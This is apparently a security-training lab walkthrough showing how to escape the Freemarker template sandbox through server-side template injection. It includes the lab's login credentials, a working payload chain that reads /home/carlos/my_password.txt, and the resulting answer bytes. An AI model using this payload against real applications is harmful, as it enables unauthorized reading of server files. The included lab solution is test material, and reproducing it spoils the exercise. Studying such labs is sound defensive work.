Server-side template injection in a sandboxed environment


This lab uses the Freemarker template engine. It is vulnerable to server-side template injection due to its poorly implemented sandbox.

Reproduction and proof of concept

  1. Log in with content-manager:C0nt3ntM4n4g3r and edit one of the product description templates. Notice that you have access to the product object.

  2. Load the JavaDoc for the Object class to find methods that should be available on all objects. Confirm that you can execute ${object.getClass()} using the product object.

  3. Explore the documentation to find a sequence of method invocations that grant access to a class with a static method that lets you read a file, such as:

${product.getClass().getProtectionDomain().getCodeSource().getLocation().toURI().resolve('/home/carlos/my_password.txt').toURL().openStream().readAllBytes()?join(" ")}
  1. Enter this payload in one of the templates and save. The output will contain the contents of the file as decimal ASCII code points.

112 98 103 120 118 53 110 109 104 54 51 48 112 107 103 113 100 100 107 107
  1. Convert the returned bytes to ASCII.

  1. Click the Submit solution button and submit this string to solve the lab.


An attacker will need to break out of the sandbox to read the file my_password.txt from Carlos’s home directory. Then submit the contents of the file.